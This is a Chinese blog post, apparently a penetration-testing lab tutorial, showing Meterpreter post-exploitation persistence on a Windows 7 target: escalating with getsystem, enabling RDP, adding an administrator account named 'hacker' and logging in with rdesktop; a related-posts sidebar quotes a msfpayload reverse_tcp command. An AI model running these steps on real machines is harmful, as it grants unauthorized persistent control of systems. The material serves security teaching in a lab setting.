权限维持——Meterpreter后渗透阶段之远程桌面开启

最新推荐文章于 2024-07-08 20:27:16 发布
最新推荐文章于 2024-07-08 20:27:16 发布
阅读量1.6k 收藏 18
点赞数 10
分类专栏: 网络渗透测试技术 文章标签: metersphere
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_70210435/article/details/134610183
版权

学习目标

学习利用Meterpreter后渗透阶段模块来开启靶机远程桌面

实验环境

攻击机:kali
靶机:windows7

实验内容

步骤一:建立session

上篇文章 步骤一样

步骤二:后渗透之开启远程桌面

1.将当前session会话提升到system权限

命令:getsystem

在这里插入图片描述

2.启动目标机的远程桌面协议,对应3389端口

命令:run post/windows/manage/enable_rdp

在这里插入图片描述

3.靶机中新建一个账号便于我们登录,并给它分配管理员权限(使用),然后将其添加到"远程桌面用户"组中,首先进入shell

命令:shell

在这里插入图片描述

添加用户命令:net user hacker 123123 /add
加入用户组命令:net localgroup administrators hacker /add

在这里插入图片描述

4.在kaili中新建一个终端,利用rdesktop对靶机进行远程桌面连接

命令:rdesktop 靶机IP

在这里插入图片描述

5.使用刚创建的用户进行登录:hacker/123123
在这里插入图片描述

6.登录成功
在这里插入图片描述

尝试学RE中
关注
  • 10
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
永恒之蓝漏洞复现(二)对目标靶机建立用户,并且开启靶机的远程桌面,使用该用户进行连接
wty923的博客
01-12 1887
对目标靶机建立用户,并且开启靶机的远程桌面,使用该用户进行连接
win11家庭版开启远程桌面功能
02-22
- 注意下方的提示,远程桌面连接需要网络身份验证,所以请确保你的账户具有管理员权限,并选择合适的身份验证方式。 3. **安全设置**: - 考虑到安全,建议禁用“允许任何版本的远程桌面客户端连接(这可能降低...
内网渗透|后渗透远程桌面
weixin_43718688的博客
05-06 1343
内网渗透|后渗透远程桌面 0x00 前言 在渗透过程中拿下一台主机后很多时候会选择开3389进远程桌面查看一下对方主机内有无一些有价值的东西可以利用,但是这也引出了一个问题,只要是登录进程就一定会留下痕迹,虽然在渗透完成后可以通过痕迹清理的方法清除自己登录的"证据",但是在多次渗透的过程中我不禁产生了思考,有没有一种方法能够最大化的隐藏自己登陆过对方主机呢,于是便有了下文。 0x01 隐藏用户(影子用户)的创建与利用进行权限维持 这里先提一个概念,在windows环境下创建用户如果后面带了一个 DOLLA
kali渗透测试之远程控制:通过激活靶机Metasploitable 2中的笑脸漏洞使其开启6200端口进行远程控制
m0_64128402的博客
11-06 759
kali渗透测试远程控制之6200端口变成了“后门”
MSF之meterpreter权限维持
梦想专栏
07-30 2064
00×01 首先,我们先来生成一个 meterpreter 类型的 PALOAD : msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=1211 X >x.exe 00×02 建立反弹处理 exploit : use exploit/mutil/handler set payload wi...
渗透——内网转发之利用reGeorg与proxychains在kali中连接远程桌面
爱国小白帽
03-19 2700
reGeorgs是HTTP端的代理工具,它提供了PHP、ASPX、JSP脚本,直接访问显示“Georg says, ‘All seems fine’”,表示脚本运行正常。 实验环境: reGeorg-master代理工具 Windows Server 2008 R2 x64(192.168.70.128) Windows Server 2003(10.1.1.2) IIS服务器 kali ...
权限维持简单总结
Aiwin的博客
08-17 4036
权限维持简单总结
应急响应实战笔记03权限维持篇(6)
qq_59468567的博客
03-04 949
渗透测试中,有三个非常经典的渗透测试框架----Metasploit、Empire、Cobalt Strike。那么,通过漏洞获取到目标主机权限后,如何利用框架获得持久性权限呢?
win10远程桌面开启工具
09-21
"win10远程桌面开启工具"是一个专为开启和管理Win10远程桌面连接设计的实用程序集合,旨在简化这个过程。 首先,我们来看看压缩包内的文件: 1. **install.bat**:这是一个批处理文件,通常用于自动化执行一系列...
死性不改的 WIN 2008开启远程桌面批处理很方便
04-13
"死性不改的WIN 2008开启远程桌面批处理很方便"这个标题暗示了一个批处理脚本可以用来简化Windows Server 2008远程桌面功能的启用过程。下面将详细介绍如何通过批处理脚本来开启Windows Server 2008的远程桌面连接。...
一键启用远程桌面服务,并且设置远程登录账号:adminstrator,密码:123
05-04
1. **开启远程桌面服务**: 在Windows系统中,可以通过“系统属性”来启用该服务。点击“开始”按钮,搜索“系统”,进入“高级系统设置”,在“远程”选项卡中选择“允许远程协助连接这台计算机”和“允许远程桌面...
永恒之蓝,【17-010】漏洞复现,实现远程桌面连接,超详细步骤,小白必看
weixin_62490257的博客
06-29 3894
永恒之蓝,【17-010】漏洞复现,实现远程桌面连接,超详细步骤,小白必看
Kali——Meterpreter渗透攻击模块-Metasploit的module模块衍生
qq_63167128的博客
03-07 1020
​ 介绍:本文展示了Meterpreter作为Metasploit模块之一的简要概念讲解及攻击流程(也可以在windows系统中下载metasploit工具进行相关操作),工具详细教程可在Sangfor学习平台获取临时免费课程进行学习。 挂个链接:深信服产业教育中心 Meterpreter模块作为后渗透攻击(该阶段通常从攻陷了目标的一些系统和获取了一部分区域系统管理权限后开始)模块的实施通道,可以根据渗透目标需求进行灵活拓展,涉及范围:信息收集,口令攫取,权限提升,内网拓展等等 ​
【内网安全】——meterpreter使用攻略
qq_53058639的博客
01-26 840
Metasploit中的Meterpreter模块在后渗透阶段具有强大的攻击力,本文主要整理了meterpreter的常用命令、脚本及使用方式。包含信息收集、提权、注册表操作、令牌操纵、哈希利用、后门植入等。
白帽黑客之Metasploit
10-25
本套教程,我们将为大家详细讲解Metasploit的使用方法。Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。 
metersphere链接腾讯邮箱步骤
最新发布
baidu_24030347的博客
07-08 200
2、在系统设置-系统参数设置-邮件设置填写授权码和SMTP信息。3、信息填写完后,可以测试连接,成功后绑定的邮箱会收到一封邮件。SMTP信息在邮箱的客户端设置中可以获取到对应的信息。生成的授权码只会展示1次,注意保存。1、打开腾讯邮箱生成授权码。路径:设置-账户-账户安全。
ubuntu远程桌面连接没有足够权限
09-18
Ubuntu远程桌面连接没有足够权限可能是由于以下原因导致的: 1. 用户权限不足:请确保您的账户具有足够的权限来进行远程桌面连接。可以尝试使用管理员账户登录,或者检查您的账户是否具有远程访问权限。 2. 设置问题:请确保您已正确配置远程桌面连接设置。在Ubuntu上,您可以使用工具如Vino或xRDP进行设置。确保启用了远程访问和共享桌面选项,并设置了正确的访问权限。 3. 防火墙/安全设置限制:防火墙或安全设置可能会限制远程桌面连接。请检查您的防火墙设置,确保允许远程连接的传入和传出连接。您还可以尝试临时禁用防火墙来排除此问题。 4. 网络问题:远程桌面连接还可能受到网络问题的影响。确保您的网络连接正常,并且网络配置没有任何限制或错误导致连接问题。 如果您仍然无法解决远程桌面连接权限问题,请尝试在Ubuntu官方论坛或互联网上搜索相关解决方案。记住,在进行任何更改之前,一定要备份重要数据并小心操作,以免造成不利影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值